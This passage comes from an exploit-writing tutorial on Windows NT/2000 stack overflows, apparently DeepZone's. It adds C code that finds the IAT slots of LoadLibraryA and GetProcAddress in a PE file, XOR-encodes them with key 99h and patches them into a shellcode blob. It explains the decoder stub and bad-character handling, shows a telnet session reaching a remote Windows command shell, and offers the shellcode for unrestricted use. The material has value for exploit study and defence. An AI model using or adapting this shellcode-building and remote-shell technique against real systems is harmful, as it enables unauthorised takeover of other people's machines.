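	a named import. The sample image it builds with build_sample_pe()
	is a constructed, hypothetical minimal PE laid out so that the
	slots come out at the same values as the listing; on a real
	target you would pass the server's executable as argv[1]. Scope
	is PE32 with by-name imports; ordinal thunks are skipped.

```c
/* Added example, not DeepZone's code: walk a PE32 import directory and report
 * the IAT slot addresses (ImageBase + FirstThunk + 4*i) for named imports, i.e.
 * the values the text obtains with a debugger.  build_sample_pe() constructs a
 * hypothetical minimal image for the demo; pass a real binary as argv[1] instead.
 * Scope: PE32 only, by-name imports only (ordinal thunks are skipped). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = v & 0xff; p[1] = v >> 8; }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (v >> (8 * i)) & 0xff; }

/* Map an RVA to a file offset through the section table (0 if unmapped). */
static uint32_t rva_to_off(const uint8_t *img, size_t len, uint32_t rva) {
    uint32_t pe = rd32(img + 0x3c);
    const uint8_t *fh = img + pe + 4, *sec = fh + 20 + rd16(fh + 16);
    for (uint16_t i = 0; i < rd16(fh + 2); i++, sec += 40) {
        if ((size_t)(sec - img) + 40 > len) return 0;
        uint32_t va = rd32(sec + 12), vsz = rd32(sec + 8), rsz = rd32(sec + 16);
        if (rva >= va && rva < va + (vsz > rsz ? vsz : rsz)) return rd32(sec + 20) + (rva - va);
    }
    return rva < rd32(img + pe + 24 + 60) ? rva : 0;   /* still inside the headers */
}

/* Absolute virtual address of the IAT slot for `func`, or 0 if absent/malformed. */
uint32_t find_iat_slot(const uint8_t *img, size_t len, const char *func) {
    if (len < 0x40 || rd16(img) != 0x5a4d) return 0;                         /* "MZ" */
    uint32_t pe = rd32(img + 0x3c);
    if (pe > len || len - pe < 24 + 224 || rd32(img + pe) != 0x4550) return 0; /* "PE\0\0" */
    const uint8_t *opt = img + pe + 24;
    if (rd16(opt) != 0x10b || rd32(opt + 92) < 2) return 0;                  /* PE32, has import dir */
    uint32_t base = rd32(opt + 28), d = rva_to_off(img, len, rd32(opt + 104));
    for (; d && d + 20 <= len; d += 20) {                                     /* IMAGE_IMPORT_DESCRIPTOR */
        uint32_t oft = rd32(img + d), name = rd32(img + d + 12), ft = rd32(img + d + 16);
        if (!name && !ft) break;                                              /* null terminator */
        uint32_t t = rva_to_off(img, len, oft ? oft : ft);                    /* INT, or IAT if none */
        for (uint32_t i = 0; t && t + 4 <= len; i++, t += 4) {
            uint32_t thunk = rd32(img + t);
            if (!thunk) break;
            if (thunk & 0x80000000u) continue;                                /* import by ordinal */
            uint32_t n = rva_to_off(img, len, thunk);                         /* IMAGE_IMPORT_BY_NAME */
            if (n && n + 2 < len && strncmp((const char *)img + n + 2, func, len - n - 2) == 0)
                return base + ft + 4 * i;                                     /* the IAT slot itself */
        }
    }
    return 0;
}

/* Hypothetical minimal PE32, constructed for the demo: one .idata section at
 * RVA 0x3000 whose IAT sits at RVA 0x3050, so the slots come out as 00403050
 * (LoadLibraryA) and 00403054 (GetProcAddress), matching the listing above. */
size_t build_sample_pe(uint8_t *buf, size_t cap) {
    if (cap < 0x400) return 0;
    memset(buf, 0, 0x400);
    wr16(buf, 0x5a4d); wr32(buf + 0x3c, 0x40);                               /* MZ, e_lfanew */
    uint8_t *fh = buf + 0x44, *opt = fh + 20, *sec = opt + 224;
    wr32(buf + 0x40, 0x4550);                                                 /* PE\0\0 */
    wr16(fh, 0x14c); wr16(fh + 2, 1); wr16(fh + 16, 224); wr16(fh + 18, 0x102);
    wr16(opt, 0x10b); wr32(opt + 28, 0x00400000);                            /* PE32, ImageBase */
    wr32(opt + 32, 0x1000); wr32(opt + 36, 0x200); wr32(opt + 56, 0x4000); wr32(opt + 60, 0x200);
    wr32(opt + 92, 16); wr32(opt + 104, 0x3000); wr32(opt + 108, 40);        /* import directory */
    memcpy(sec, ".idata", 6); wr32(sec + 8, 0x200); wr32(sec + 12, 0x3000);
    wr32(sec + 16, 0x200); wr32(sec + 20, 0x200); wr32(sec + 36, 0xC0000040);
    uint8_t *id = buf + 0x200;                                                /* file offset of RVA 0x3000 */
    wr32(id, 0x3040); wr32(id + 12, 0x3060); wr32(id + 16, 0x3050);          /* OFT, Name, FirstThunk */
    const uint32_t nm[] = { 0x3070, 0x3080, 0x30a0 };
    const char *fn[] = { "LoadLibraryA", "GetProcAddress", "ExitProcess" };
    for (int i = 0; i < 3; i++) {
        wr32(id + 0x40 + 4 * i, nm[i]);                                       /* INT entry */
        wr32(id + 0x50 + 4 * i, nm[i]);                                       /* IAT entry (unbound) */
        strcpy((char *)id + (nm[i] - 0x3000) + 2, fn[i]);                     /* hint, then name */
    }
    strcpy((char *)id + 0x60, "KERNEL32.dll");
    return 0x400;
}

/* Slot address of `func` in the sample image (convenience for callers/tests). */
uint32_t sample_slot(const char *func) {
    uint8_t pe[0x400];
    return find_iat_slot(pe, build_sample_pe(pe, sizeof pe), func);
}

int main(int argc, char **argv) {
    static uint8_t img[8u << 20];                                             /* images up to 8 MiB */
    size_t n = 0;
    if (argc > 1) {                                                           /* real binary from disk */
        FILE *f = fopen(argv[1], "rb");
        if (f) { n = fread(img, 1, sizeof img, f); fclose(f); }
    } else n = build_sample_pe(img, sizeof img);
    const char *want[] = { "LoadLibraryA", "GetProcAddress" };
    for (int i = 0; i < 2; i++)
        printf("%-15s IAT slot: %08x\n", want[i], find_iat_slot(img, n, want[i]));
    return 0;
}
```

	The slot is what the shellcode wants, not the thunk's current
	contents: the loader fills the slot at run time, so the value
	found here stays valid across reboots for the same build of the
	binary, which is exactly the property the text relies on.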

	The shellcode has been XORed with 99h to remove possible
	nulls, so this detail must be taken into account when storing
	the addresses: each address goes in little-endian order and
	every byte is XORed with 99h (LLB4 is the low byte of the
	LoadLibraryA slot, LLB1 the high byte; likewise GPB4..GPB1).
	The first 37 bytes of the blob are the decoder (a get-EIP
	stub followed by a lodsb / xor al,99h / stosb / loop over the
	next 495h bytes); everything after it, the two addresses
	included, is decoded in place at run time. One caveat: an
	address byte equal to 99h would encode to 00h, so a slot
	containing that byte cannot be used with this key.

	At this point we insert the two XORed addresses byte by byte
	and try to run the test code, "simulating" a hijack of the
	flow through an unconditional jump to the shellcode (in a
	real b0f the shellcode would live on the stack).
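	Encoding and patching the two addresses, as an added example
	that is not DeepZone's code: the C below encodes a 32-bit slot
	address the way the blob stores it, refuses any byte that
	would become 00h or another forbidden character, writes both
	values into the LLB/GPB slots and then mirrors the blob's own
	decoder to confirm that the result reads push 00403050h and
	push 00403054h. The slot offsets 798 and 815 were counted from
	the db lines above (line 89, byte 7 and line 91, byte 6 of the
	blob); the 27-byte excerpt is copied from the three db lines
	that hold the slots; the bad-character list "\r\n" is an
	assumption for a line-oriented protocol and is not from the
	text.

```c
/* Added example, not DeepZone's code: encode the two IAT slot addresses the way
 * the blob expects them (little-endian, each byte XOR 99h), refuse values that
 * would produce a null or another forbidden byte, patch them into the LLB/GPB
 * slots and mirror the blob's own decoder to check the result.  The 27-byte
 * excerpt below is copied from the three `db` lines that hold the slots; the
 * offsets LLB_OFF/GPB_OFF are counted from the start of the 1215-byte blob. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define XOR_KEY   0x99u
#define LLB_OFF   798          /* LLB4..LLB1: LoadLibraryA slot, db line 89, byte 7 */
#define GPB_OFF   815          /* GPB4..GPB1: GetProcAddress slot, db line 91, byte 6 */
#define DEC_START 37           /* length of the decoder stub; decoding starts here ... */
#define DEC_COUNT 0x495        /* ... and covers this many bytes (mov cx,0495h) */

/* Encode addr as the blob stores it.  Returns 0, or the 1-based index of the
 * first encoded byte that is 00h or listed in badchars (e.g. "\r\n"). */
int encode_addr(uint32_t addr, uint8_t out[4], const char *badchars) {
    for (int i = 0; i < 4; i++) {
        out[i] = ((addr >> (8 * i)) & 0xff) ^ XOR_KEY;              /* low byte first */
        if (out[i] == 0 || (badchars && strchr(badchars, out[i]))) return i + 1;
    }
    return 0;
}

int encode_status(uint32_t addr, const char *badchars) {             /* encode_addr, status only */
    uint8_t tmp[4];
    return encode_addr(addr, tmp, badchars);
}

/* Patch both slots in a blob (or in an excerpt, with offsets rebased by the
 * caller).  Returns 0, -1 on a bad offset, -2/-3 if an address is not encodable. */
int patch_slots(uint8_t *blob, size_t len, size_t llb, size_t gpb,
                uint32_t loadlib_slot, uint32_t getproc_slot, const char *badchars) {
    uint8_t enc[4];
    if (llb + 4 > len || gpb + 4 > len) return -1;
    if (encode_addr(loadlib_slot, enc, badchars)) return -2;
    memcpy(blob + llb, enc, 4);
    if (encode_addr(getproc_slot, enc, badchars)) return -3;
    memcpy(blob + gpb, enc, 4);
    return 0;
}

/* Same transform as the stub's lodsb / xor al,99h / stosb / loop, in C. */
void decode_in_place(uint8_t *buf, size_t start, size_t count) {
    for (size_t i = 0; i < count; i++) buf[start + i] ^= XOR_KEY;
}

/* Decode a full copy of the 1215-byte blob exactly as the stub does at run time. */
void decode_blob(uint8_t *blob) { decode_in_place(blob, DEC_START, DEC_COUNT); }

/* Constructed excerpt: db lines 89-91 of the blob (offsets 792..818) with the
 * unfilled 00h xor 99h placeholders.  Decoded it reads: (tail of a disp32),
 * push ecx, push esi, push imm32, nop, pop edx, call [edx], ..., push imm32. */
static const uint8_t excerpt[27] = {
    0xbc,0xd9,0x99,0xc8,0xcf,0xf1, 0x99,0x99,0x99,
    0x99, 0x09,0xc3,0x66,0x8b,0xc9,0xc2,0xc0,0xce,
    0xc7,0xc8,0xcf,0xca,0xf1, 0x99,0x99,0x99,0x99
};
#define EXCERPT_BASE 792

/* Patch the excerpt with the addresses from the text and decode it; `out` then
 * holds plain opcodes.  Returns the patch_slots() status. */
int demo_patch(uint8_t out[27]) {
    memcpy(out, excerpt, sizeof excerpt);
    int rc = patch_slots(out, sizeof excerpt, LLB_OFF - EXCERPT_BASE, GPB_OFF - EXCERPT_BASE,
                         0x00403050u, 0x00403054u, "\r\n");
    if (rc == 0) decode_in_place(out, 0, sizeof excerpt);
    return rc;
}

/* Immediate of the decoded `push imm32` at `off` in the patched excerpt (0 if not a push). */
uint32_t demo_push_imm(size_t off) {
    uint8_t out[27];
    if (demo_patch(out) || off + 5 > sizeof out || out[off] != 0x68) return 0;
    return (uint32_t)out[off + 1] | ((uint32_t)out[off + 2] << 8) |
           ((uint32_t)out[off + 3] << 16) | ((uint32_t)out[off + 4] << 24);
}

int main(void) {
    uint8_t out[27];
    printf("patch status %d\n", demo_patch(out));
    printf("LoadLibraryA   slot decodes to push %08x\n", demo_push_imm(5));
    printf("GetProcAddress slot decodes to push %08x\n", demo_push_imm(22));
    printf("00409950 encodable? status %d (byte 99h would become 00h)\n",
           encode_status(0x00409950u, NULL));
    return 0;
}
```

	On the full blob the same two calls are patch_slots(blob, 1215,
	LLB_OFF, GPB_OFF, ...) followed, for verification only, by
	decode_blob() on a copy; the copy you send stays encoded, since
	the stub decodes it on the target.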

	Let's check that we have a remote console ...

	$ uname
	Linux

	$ telnet mana.mareas.deepzone.org 8008
	Trying 192.168.14.34...
	Connected to mana.mareas.deepzone.org.
	Escape character is '^]'.

	Microsoft Windows 2000 [Version 5.00.2195]
	(C) Copyright 1985-1999 Microsoft Corp.

	C:>


	Last words ...
	______________

	This article has tried to provide a quick and efficient way of
	exploiting stack overflows on WinNT/2k. At the same time it
	provides a "portable", easy-to-integrate shellcode that may be
	used freely and without restriction.

	The latest updates to this paper and optimisations of the code
	can be downloaded from http://www.deepzone.org


	---

	[1] "Smashing The Stack For Fun And Profit"
	     http://www.phrack.com/search.phtml?view&article=p49-14

            "Win32 Buffer Overflows (Location, Exploitation and Prevention)"
             http://www.phrack.com/search.phtml?view&article=p55-15


	___________________________________________________________________

					     		       -- |Zan/DZ
							<izan@deepzone.org>
	___________________________________________________________________
	
